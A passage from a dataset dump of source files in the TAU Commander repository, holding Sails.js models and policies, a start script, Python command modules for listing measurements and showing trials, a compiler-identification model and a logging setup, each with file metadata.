type: 'boolean',\n defaultsTo: false\n },\n\n io: {\n type: 'boolean',\n defaultsTo: false\n },\n\n memory: {\n type: 'boolean',\n defaultsTo: false\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.6121212244033813, "alphanum_fraction": 0.6181818246841431, "avg_line_length": 22.428571701049805, "blob_id": "bf790218c7ef51559a8815d256674eb5eb5ad33e", "content_id": "114acd26222f0cafe5af3394d8cd83195bb1e5b8", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 165, "license_type": "permissive", "max_line_length": 54, "num_lines": 7, "path": "/commander/bin/start.sh", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/bash\nHERE=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\n\nexport NODE_ENV=\"production\"\n\nexport PATH=$HERE/../node_modules/.bin:$PATH\nsails lift --prod $@\n\n" }, { "alpha_fraction": 0.6902157664299011, "alphanum_fraction": 0.6931717395782471, "avg_line_length": 28.929203033447266, "blob_id": "b29ad399e262a0b117065924d97e39774a3c5736", "content_id": "c27bf605da3049a0483251a33144e00c8ec00839", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3383, "license_type": "permissive", "max_line_length": 90, "num_lines": 113, "path": "/packages/tau/commands/trial/show.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. 
Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport commands\nimport error\nimport util\nimport arguments as args\nimport environment as env\nfrom model.experiment import Experiment\nfrom model.trial import Trial\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Display trial data in analysis tool.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [trial_number] [trial_number] ... [arguments]\n %(command)s -h | --help\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('numbers',), {'help': \"If given, show details for trial with this number\",\n 'metavar': 'trial_number', \n 'nargs': '*',\n 'default': args.SUPPRESS})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n selection = Experiment.getSelected()\n if not selection:\n LOGGER.info(\"No experiment configured. 
See `tau project select`\\n\")\n return tau.EXIT_FAILURE\n \n \n try:\n str_numbers = args.numbers\n except AttributeError:\n numbers = None\n else:\n numbers = []\n for n in str_numbers:\n try:\n numbers.append(int(n))\n except ValueError:\n PARSER.error(\"Invalid trial number: %s\" % n)\n\n return selection.show(numbers)\n\n" }, { "alpha_fraction": 0.6193143129348755, "alphanum_fraction": 0.6273733377456665, "avg_line_length": 31.8295955657959, "blob_id": "fc6d23ae59d68b94b1fb64c4d39134b8f31ccf3c", "content_id": "79a0525d4aaed4bb3c22e85f9a07a7a9dc24757e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7321, "license_type": "permissive", "max_line_length": 119, "num_lines": 223, "path": "/packages/tau/model/compiler.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n# System modules\nimport os\nimport hashlib\n\n# TAU modules\nimport logger\nimport settings\nimport error\nimport controller\nimport util\nimport cf.tau\nfrom model.project import Project\nfrom model.target import Target\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass CompilerInfo(object):\n \"\"\"\n Information about a compiler command\n \"\"\"\n def __init__(self, cmd, role, family, language):\n self.command = cmd\n self.role = role\n self.family = family\n self.language = language\n self.tau_wrapper = cf.tau.COMPILER_WRAPPERS[role]\n self.short_descr = \"%s %s compiler.\" % (family, language)\n def __repr__(self):\n return repr(self.__dict__)\n\nKNOWN_COMPILERS = {\n 'cc': CompilerInfo('cc', 'CC', 'system', 'C'),\n 'c++': CompilerInfo('c++', 'CXX', 'system', 'C++'),\n 'f77': CompilerInfo('f77', 'FC', 'system', 'FORTRAN77'),\n 'f90': CompilerInfo('f90', 'FC', 'system', 'Fortran90'),\n 'ftn': CompilerInfo('ftn', 'FC', 'system', 'Fortran90'),\n 'gcc': CompilerInfo('gcc', 'CC', 'GNU', 'C'),\n 'g++': CompilerInfo('g++', 'CXX', 'GNU', 'C++'),\n 'gfortran': CompilerInfo('gfortran', 'FC', 'GNU', 'Fortran90'),\n 'icc': CompilerInfo('icc', 'CC', 'Intel', 'C'),\n 'icpc': CompilerInfo('icpc', 'CXX', 'Intel', 'C++'),\n 'ifort': CompilerInfo('ifort', 'FC', 'Intel', 'Fortran90'),\n 'pgcc': CompilerInfo('pgcc', 'CC', 'PGI', 'C'),\n 'pgCC': CompilerInfo('pgCC', 'CXX', 'PGI', 'C++'),\n 'pgf77': CompilerInfo('pgf77', 'FC', 'PGI', 'FORTRAN77'),\n 'pgf90': CompilerInfo('pgf90', 'FC', 'PGI', 'Fortran90'),\n 'mpicc': CompilerInfo('mpicc', 'CC', 'MPI', 'C'),\n 'mpicxx': CompilerInfo('mpicxx', 'CXX', 'MPI', 'C++'),\n 'mpic++': CompilerInfo('mpic++', 'CXX', 'MPI', 'C++'),\n 'mpiCC': CompilerInfo('mpiCC', 'CXX', 'MPI', 'C++'),\n 'mpif77': CompilerInfo('mpif77', 'FC', 'MPI', 'FORTRAN77'),\n 'mpif90': CompilerInfo('mpif90', 'FC', 'MPI', 'Fortran90')\n }\n\nKNOWN_FAMILIES = {}\nfor comp in KNOWN_COMPILERS.itervalues():\n family = comp.family\n KNOWN_FAMILIES.setdefault(family, [])\n KNOWN_FAMILIES[family].append(comp)\ndel comp\n\nclass Compiler(controller.Controller):\n \"\"\"\n Compiler data model controller\n \"\"\"\n \n attributes = {\n 'command': {\n 'type': 'string',\n 'required': True,\n },\n 'path': {\n 'type': 'string',\n 'required': True,\n },\n 'md5': {\n 'type': 'string',\n 'required': True,\n },\n 'version': {\n 'type': 'string',\n 'required': True\n },\n 'role': {\n 'type': 'string',\n 'required': True\n },\n 'family': {\n 'type': 'string',\n 'required': True\n },\n 'language': {\n 'type': 'string',\n 'required': True\n },\n 'tau_wrapper': {\n 'type': 'string',\n 'required': True\n }\n }\n \n def __str__(self):\n return self['command']\n \n def absolutePath(self):\n return os.path.join(self['path'], self['command'])\n\n @classmethod\n def identify(cls, compiler_cmd):\n \"\"\"\n Identifies a compiler executable from `compiler_cmd`\n \"\"\"\n LOGGER.debug(\"Identifying compiler: %s\" % compiler_cmd)\n command = os.path.basename(compiler_cmd)\n path = 
util.which(compiler_cmd)\n try:\n info = KNOWN_COMPILERS[command]\n except KeyError:\n raise error.ConfigurationError(\"Unknown compiler command: '%s'\", compiler_cmd)\n if not path:\n raise error.ConfigurationError(\"%s %s compiler '%s' missing or not executable.\" % \n (info.family, info.language, compiler_cmd), \n \"Check spelling, loaded modules, PATH environment variable, and file permissions\")\n if not util.file_accessible(path):\n raise error.ConfigurationError(\"Compiler '%s' not readable.\" % (os.path.join(path, command)))\n\n md5sum = hashlib.md5()\n with open(path, 'r') as compiler_file:\n md5sum.update(compiler_file.read())\n md5 = md5sum.hexdigest()\n\n # TODO: Compiler version\n version = 'FIXME'\n \n fields = {'command': command,\n 'path': path,\n 'md5': md5,\n 'version': version,\n 'role': info.role,\n 'family': info.family,\n 'language': info.language,\n 'tau_wrapper': info.tau_wrapper}\n \n found = cls.one(keys=fields)\n if found:\n LOGGER.debug(\"Found compiler record: %s\" % found)\n else:\n LOGGER.debug(\"No compiler record found. Creating new record: %s\" % fields)\n found = cls.create(fields)\n return found\n\n @classmethod\n def getSiblings(cls, compiler):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Getting compilers for '%s'\" % compiler)\n\n compilers = {compiler['role']: compiler}\n for known in KNOWN_COMPILERS.itervalues():\n LOGGER.debug(\"Checking %s\" % known)\n if (known.family == compiler['family']) and (known.role != compiler['role']):\n try:\n other = cls.identify(known.command)\n except error.ConfigurationError, e:\n LOGGER.debug(e)\n continue\n if os.path.dirname(other['path']) == os.path.dirname(compiler['path']):\n LOGGER.debug(\"Found %s compiler '%s' matching '%s'\" % (other['role'], other['command'], compiler['command']))\n compilers[other['role']] = other\n\n try:\n cc = compilers['CC']\n except KeyError:\n raise error.ConfigurationError(\"Cannot find C compiler for %s\" % compiler)\n try:\n cxx = compilers['CXX']\n except KeyError:\n raise error.ConfigurationError(\"Cannot find C++ compiler for %s\" % compiler)\n try:\n fc = compilers['FC']\n except KeyError:\n raise error.ConfigurationError(\"Cannot find Fortran compiler for %s\" % compiler)\n\n return cc, cxx, fc\n" }, { "alpha_fraction": 0.5036231875419617, "alphanum_fraction": 0.5036231875419617, "avg_line_length": 13.706666946411133, "blob_id": "1a1d62421021178b1bce3fb55c1bee2f1a3b0b49", "content_id": "36f43df156df68af0bbd3cd6dd05c96f335c27e3", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1104, "license_type": "permissive", "max_line_length": 108, "num_lines": 75, "path": "/commander/api/models/Application.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Application.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n user: {\n model: 'User', \n required: true \n },\n\n // Projects this application belongs to\n projects: {\n collection: 'Project',\n via: 'applications'\n },\n\n // Application name\n name: {\n type: 'string',\n required: true\n },\n\n version: {\n type: 'string',\n },\n\n source: {\n type: 'binary',\n },\n\n repo: {\n type: 'string',\n },\n\n openmp: {\n type: 'boolean',\n defaultsTo: false\n },\n\n 
pthreads: {\n type: 'boolean',\n defaultsTo: false\n },\n\n mpi: {\n type: 'boolean',\n defaultsTo: false\n },\n\n cuda: {\n type: 'boolean',\n defaultsTo: false\n },\n\n shmem: {\n type: 'boolean',\n defaultsTo: false\n },\n \n mpc: {\n type: 'boolean',\n defaultsTo: false\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.6184027194976807, "alphanum_fraction": 0.6203943490982056, "avg_line_length": 34.11188888549805, "blob_id": "de0b48baa1f91ccd4b9016baff6c9a808c515c72", "content_id": "523424ecde3ad7690656b1de6f37e2f7e50fd355", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5021, "license_type": "permissive", "max_line_length": 96, "num_lines": 143, "path": "/packages/tau/commands/measurement/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport arguments as args\nimport environment as env\nfrom model.measurement import Measurement\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"List measurement configurations or show configuration details.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [measurement_name] [measurement_name] ... 
[arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('names',), {'help': \"If given, show details for the measurement with this name\",\n 'metavar': 'measurement_name', \n 'nargs': '*',\n 'default': args.SUPPRESS}),\n (('-l','--long'), {'help': \"Display all information about the measurement\",\n 'action': 'store_true',\n 'default': False})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n try:\n names = args.names\n except AttributeError:\n found = Measurement.all()\n else:\n found = []\n for name in names:\n t = Measurement.withName(name)\n if t:\n found.append(t)\n else:\n PARSER.error(\"No measurement configuration named '%s'\" % name)\n\n title = '{:=<{}}'.format('== Measurements (%s) ==' % env.USER_PREFIX, \n logger.LINE_WIDTH)\n if not found:\n listing = \"No measurements. See 'tau measurement create --help'\"\n else:\n yesno = lambda x: 'Yes' if x else 'No'\n table = Texttable(logger.LINE_WIDTH)\n cols = [('Name', 'r', lambda t: t['name']), \n ('Profile', 'c', lambda t: yesno(t['profile'])), \n ('Trace', 'c', lambda t: yesno(t['trace'])), \n ('Sample', 'c', lambda t: yesno(t['sample'])),\n ('Source Inst.', 'c', lambda t: yesno(t['source_inst'])),\n ('Compiler Inst.', 'c', lambda t: t['compiler_inst']),\n ('MPI', 'c', lambda t: yesno(t['mpi'])),\n ('OpenMP', 'c', lambda t: t['openmp']),\n ('Callpath Depth', 'c', lambda t: t['callpath']),\n ('Mem. Usage', 'c', lambda t: yesno(t['memory_usage'])),\n ('Mem. 
Alloc', 'c', lambda t: yesno(t['memory_alloc'])),\n ('In Projects', 'l', None)]\n headers = [header for header, _, _ in cols]\n rows = [headers]\n if args.long:\n parts = []\n for t in found:\n populated = t.populate()\n parts.append(pformat(populated))\n listing = '\\n'.join(parts)\n else:\n for t in found:\n populated = t.populate()\n projects = ', '.join([p['name'] for p in populated['projects']])\n row = [fnc(populated) for _, _, fnc in cols if fnc] + [projects]\n rows.append(row)\n table.set_cols_align([align for _, align, _ in cols])\n table.add_rows(rows)\n listing = table.draw()\n \n LOGGER.info('\\n'.join([title, '', listing, '']))\n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.6127451062202454, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 11, "blob_id": "2784af68e5f03fe4cb5ee8f6d5350b0ff2e6742c", "content_id": "20e48491e25d95b428221650deb1b1166113a972", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 204, "license_type": "permissive", "max_line_length": 47, "num_lines": 17, "path": "/commander/README.md", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "# TAU Commander\n\n## Requirements\n\n * [Node.js >0.10](http://nodejs.org/)\n\n## Quick Start\n\n```\nnpm install\n./bin/start.sh\n```\nNavigate to `http://localhost:1337/` and enjoy.\n\n## License\n\nSee LICENSE file.\n" }, { "alpha_fraction": 0.6215277910232544, "alphanum_fraction": 0.6238425970077515, "avg_line_length": 35, "blob_id": "46fd2bf843f674ad15b1d89cb7e6c495092f4c90", "content_id": "b6e57e95220f049d60bb04747a91fb9fa590ea48", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 864, "license_type": "permissive", "max_line_length": 82, "num_lines": 24, "path": "/commander/api/policies/sidebar.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * sidebar\n *\n * @module :: Policy\n * @description :: Provides sidebar items\n * @docs :: http://sailsjs.org/#!documentation/policies\n *\n */\nmodule.exports = function(req, res, next) {\n var sidebar_items = [\n {title: 'Dashboard', href: '/dashboard', icon: 'glyphicon-th-large'},\n {title: 'Projects', href: '/project', icon: 'glyphicon-ok-circle'},\n {title: 'Applications', href: '/application', icon: 'glyphicon-modal-window'},\n {title: 'Targets', href: '/target', icon: 'glyphicon-screenshot'},\n {title: 'Measurements', href: '/measurement', icon: 'glyphicon-stats'},\n {title: 'Help', href: '/help', icon: 'glyphicon-question-sign'},\n ];\n\n for (i=0; i<sidebar_items.length; i++) {\n sidebar_items[i].active = (req.path.indexOf(sidebar_items[i].href) == 0);\n }\n res.locals.sidebar_items = sidebar_items;\n return next();\n};\n" }, { "alpha_fraction": 0.6632256507873535, "alphanum_fraction": 0.6697948575019836, "avg_line_length": 31.290042877197266, "blob_id": "79a4c431873f86bc8b854038136ce6e95b16c3cb", "content_id": "9f59b334a01276f48f69e7b266a1246a054e6627", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7459, "license_type": "permissive", "max_line_length": 102, "num_lines": 231, "path": "/packages/tau/logger.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. 
Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2015, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport errno\nimport logging\nimport textwrap\nimport contextlib\nimport socket\nimport platform\nfrom datetime import datetime\nfrom logging import handlers\n\n# TAU modules\nimport environment\n\ndef getTerminalSize():\n import platform\n current_os = platform.system()\n tuple_xy=None\n if current_os == 'Windows':\n tuple_xy = _getTerminalSize_windows()\n if tuple_xy is None:\n tuple_xy = _getTerminalSize_tput()\n # needed for window's python in cygwin's xterm!\n if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):\n tuple_xy = _getTerminalSize_linux()\n if tuple_xy is None:\n tuple_xy = (80, 25) # default value\n return tuple_xy\n\ndef _getTerminalSize_windows():\n res=None\n try:\n from ctypes import windll, create_string_buffer\n # stdin handle is -10, stdout -11, stderr -12\n h = windll.kernel32.GetStdHandle(-12)\n csbi = create_string_buffer(22)\n res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)\n except:\n return None\n if res:\n import struct\n (bufx, bufy, curx, cury, wattr,\n left, top, right, bottom, maxx, maxy) = struct.unpack(\"hhhhHhhhhhh\", csbi.raw)\n sizex = right - left + 1\n sizey = bottom - top + 1\n return sizex, sizey\n else:\n return None\n\ndef _getTerminalSize_tput():\n # get terminal width\n # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window\n try:\n import subprocess\n proc=subprocess.Popen([\"tput\", \"cols\"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)\n output=proc.communicate(input=None)\n cols=int(output[0])\n proc=subprocess.Popen([\"tput\", \"lines\"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)\n output=proc.communicate(input=None)\n rows=int(output[0])\n return (cols,rows)\n except:\n return None\n\ndef _getTerminalSize_linux():\n def ioctl_GWINSZ(fd):\n try:\n import fcntl, 
termios, struct, os\n cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234'))\n except:\n return None\n return cr\n cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)\n if not cr:\n try:\n fd = os.open(os.ctermid(), os.O_RDONLY)\n cr = ioctl_GWINSZ(fd)\n os.close(fd)\n except:\n pass\n if not cr:\n try:\n cr = (os.environ['LINES'], os.environ['COLUMNS'])\n except:\n return None\n return int(cr[1]), int(cr[0])\n\ndef _textwrap_message(record):\n return ['%s%s' % (LINE_MARKER, _text_wrapper.fill(line))\n for line in record.getMessage().split('\\n')]\n\n\ndef _msgbox(record, marker):\n width = LINE_WIDTH - len(LINE_MARKER)\n hline = LINE_MARKER + marker*width\n parts = [hline, LINE_MARKER, '%s%s' % (LINE_MARKER, record.levelname)]\n parts.extend(_textwrap_message(record))\n parts.append(hline)\n return '\\n'.join(parts)\n\n\nclass LogFormatter(logging.Formatter, object):\n \"\"\"\n Custom log message formatter.\n \"\"\"\n\n def __init__(self):\n super(LogFormatter, self).__init__()\n\n def format(self, record):\n if record.levelno == logging.CRITICAL:\n return _msgbox(record, '!')\n elif record.levelno == logging.ERROR:\n return _msgbox(record, '!')\n elif record.levelno == logging.WARNING:\n return _msgbox(record, '*')\n elif record.levelno == logging.INFO:\n return '\\n'.join(_textwrap_message(record))\n elif record.levelno == logging.DEBUG:\n return '%s%s:%s: %s' % (LINE_MARKER, record.levelname, \n record.name, record.getMessage()) \n else:\n raise RuntimeError('Unknown record level (name: %s)' % record.levelname)\n\ndef getLogger(name):\n \"\"\"\n Returns a customized logging object by name\n \"\"\"\n return logging.getLogger('tau.' + name)\n\ndef setLogLevel(level):\n \"\"\"\n Sets the output level for all logging objects\n \"\"\"\n global LOG_LEVEL\n LOG_LEVEL = level.upper()\n stdout_handler.setLevel(LOG_LEVEL)\n\nLOG_LEVEL = 'INFO'\n\nLOG_FILE = os.path.join(environment.USER_PREFIX, 'debug_log')\n\n# Marker for each line of output\nLINE_MARKER = os.environ.get('TAU_LINE_MARKER', '')\n\n# Terminal dimensions\nTERM_SIZE = getTerminalSize()\nLINE_WIDTH = TERM_SIZE[0] - len(LINE_MARKER)\n\n_text_wrapper = textwrap.TextWrapper(width=LINE_WIDTH, \n subsequent_indent=LINE_MARKER+' ',\n break_long_words=False,\n break_on_hyphens=False,\n drop_whitespace=False)\n\n_root_logger = logging.getLogger('tau')\nif not len(_root_logger.handlers):\n prefix = os.path.dirname(LOG_FILE)\n try:\n os.makedirs(prefix)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(prefix): pass\n else: raise\n file_handler = handlers.TimedRotatingFileHandler(LOG_FILE, when='D', interval=1, backupCount=5)\n file_handler.setFormatter(LogFormatter())\n file_handler.setLevel(logging.DEBUG)\n\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(LogFormatter())\n stdout_handler.setLevel(LOG_LEVEL)\n \n _root_logger.addHandler(file_handler)\n _root_logger.addHandler(stdout_handler)\n _root_logger.setLevel(logging.DEBUG) \n\n _root_logger.debug(\"\"\"\n%(bar)s\nTAU COMMANDER LOGGING INITIALIZED\n\nTimestamp : %(timestamp)s\nHostname : %(hostname)s\nPlatform : %(platform)s\nPython Version : %(pyversion)s\nWorking Directory : %(cwd)s\nTerminal Size : %(termsize)s\n%(bar)s\n\"\"\" % {'bar': '#'*LINE_WIDTH,\n 'timestamp': str(datetime.now()),\n 'hostname': socket.gethostname(), \n 'platform': platform.platform(), \n 'pyversion': platform.python_version(), \n 'cwd': os.getcwd(), \n 'termsize': 'x'.join(map(str, TERM_SIZE))})\n" }, { "alpha_fraction": 0.6043956279754639, 
